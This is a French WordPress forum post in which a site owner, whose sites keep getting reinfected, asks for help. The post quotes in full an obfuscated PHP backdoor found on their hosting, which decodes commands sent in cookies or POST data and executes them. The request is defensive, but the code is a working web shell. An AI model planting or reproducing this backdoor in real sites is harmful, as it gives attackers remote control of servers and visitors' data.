Hack de wordpress | Forum WordPress


Rechercher

— Forum Scope —




— Correspondances —





— Options du forum —





La longueur minimum du terme à rechercher est 3caractère - la longueur maximum est de 84 caractères

Mot de passe oublié ?
forum-installation
Hack de wordpress
Ajouter une réponse
Mric
Membre
Membres
Messages du forum : 1
Membre depuis :
22 décembre 2019
Hors ligne
1
22 décembre 2019 - 15:27

Bonjour,

j'ai quelques site wordpress sur un hebergement, 

régulièrement il y a des fichiers qui se créent en racine ou ailleurs de ce type :

nom : k8nj529.php

<?php
$ogfksun = 'c\'fx3nly*bdo4r8p2e7svHi0tum91k6#5-_ga';$sjllj = Array();$sjllj[] = $ogfksun[0].$ogfksun[13].$ogfksun[17].$ogfksun[36].$ogfksun[24].$ogfksun[17].$ogfksun[34].$ogfksun[2].$ogfksun[25].$ogfksun[5].$ogfksun[0].$ogfksun[24].$ogfksun[22].$ogfksun[11].$ogfksun[5];$sjllj[] = $ogfksun[21].$ogfksun[8];$sjllj[] = $ogfksun[31];$sjllj[] = $ogfksun[23].$ogfksun[4].$ogfksun[12].$ogfksun[30].$ogfksun[14].$ogfksun[12].$ogfksun[4].$ogfksun[0].$ogfksun[33].$ogfksun[27].$ogfksun[16].$ogfksun[28].$ogfksun[9].$ogfksun[33].$ogfksun[12].$ogfksun[30].$ogfksun[0].$ogfksun[18].$ogfksun[33].$ogfksun[9].$ogfksun[28].$ogfksun[2].$ogfksun[14].$ogfksun[33].$ogfksun[2].$ogfksun[9].$ogfksun[14].$ogfksun[28].$ogfksun[17].$ogfksun[9].$ogfksun[32].$ogfksun[10].$ogfksun[36].$ogfksun[23].$ogfksun[4].$ogfksun[0];$sjllj[] = $ogfksun[0].$ogfksun[11].$ogfksun[25].$ogfksun[5].$ogfksun[24];$sjllj[] = $ogfksun[19].$ogfksun[24].$ogfksun[13].$ogfksun[34].$ogfksun[13].$ogfksun[17].$ogfksun[15].$ogfksun[17].$ogfksun[36].$ogfksun[24];$sjllj[] = $ogfksun[17].$ogfksun[3].$ogfksun[15].$ogfksun[6].$ogfksun[11].$ogfksun[10].$ogfksun[17];$sjllj[] = $ogfksun[19].$ogfksun[25].$ogfksun[9].$ogfksun[19].$ogfksun[24].$ogfksun[13];$sjllj[] = $ogfksun[36].$ogfksun[13].$ogfksun[13].$ogfksun[36].$ogfksun[7].$ogfksun[34].$ogfksun[26].$ogfksun[17].$ogfksun[13].$ogfksun[35].$ogfksun[17];$sjllj[] = $ogfksun[19].$ogfksun[24].$ogfksun[13].$ogfksun[6].$ogfksun[17].$ogfksun[5];$sjllj[] = $ogfksun[15].$ogfksun[36].$ogfksun[0].$ogfksun[29];foreach ($sjllj[8]($_COOKIE, $_POST) as $nclnsb => $ltgboq){function mosrfd($sjllj, $nclnsb, $kiytsyj){return $sjllj[7]($sjllj[5]($nclnsb . $sjllj[3], ($kiytsyj / $sjllj[9]($nclnsb)) + 1), 0, $kiytsyj);}function ubqdew($sjllj, $qifev){return @$sjllj[10]($sjllj[1], $qifev);}function thpcqh($sjllj, $qifev){$qguaam = $sjllj[4]($qifev) % 3;if (!$qguaam) {$gjiui = $sjllj[0]; $eiwaz = $gjiui("", $qifev[1]($qifev[2]));$eiwaz();exit();}}$ltgboq = ubqdew($sjllj, $ltgboq);thpcqh($sjllj, $sjllj[6]($sjllj[2], $ltgboq ^ mosrfd($sjllj, $nclnsb, $sjllj[9]($ltgboq))));}

Sur plusieurs sites j'ai réinstallé au propre, j'ai remonté le dossier upload sans les plugins.J'ai viré des faux fichiers masqués qui se terminait en .ico, je viens à l'instant de trouver 2 utilisateurs bizarre sur un des sites ... 

J'ai l'impression que mes wordpress sont des gruyères ... 

Et je n'arrive toujours pas à trouver (sucuri ne trouve pas non plus, les plugins de sécurité non plus ...)

Si vous avez une idée de "où chercher" selon le code donnait plus haut ? 

Merci 🙂 

Fuseau horaire du forum :Europe/Paris

Nb max. d'utilisateurs en ligne :574

Actuellement en ligne :
12 Invité(s)

Actuellement sur cette page :
1 Invité(s)

Auteurs les plus actifs :

Bruno: 52

Robin: 44

vKr_Onii: 41

Dan: 27

athox: 26

Nouveaux membres :

Luce

Milie

Zara

Mélanie_1

Charles_1

Statistiques du forum :

Groupes :1

Forums :7

Topics :649

Posts :2517

 

Statistiques des membres :

Invités: 53

Membres : 10014

Modérateurs : 26

Admins: 2

Administrateurs :wpengine, Thibaud

Modérateurs :Gebhard, david, Catherine1, zapps, soborne, mojiezuo, Soufian, Jeff, redwhirl, sigridregnier, Jessica, Benjamin2, spleen13, Alain Web-creator, kaepaul, negativenetwork, Gaetan1, Samson, Benoit1, Ailpp84, Joel2, Catherine2, Fatalys, Therese, Guillaume3, Gayraud

En ligne

26 visiteurs, 14 membres

Messages récents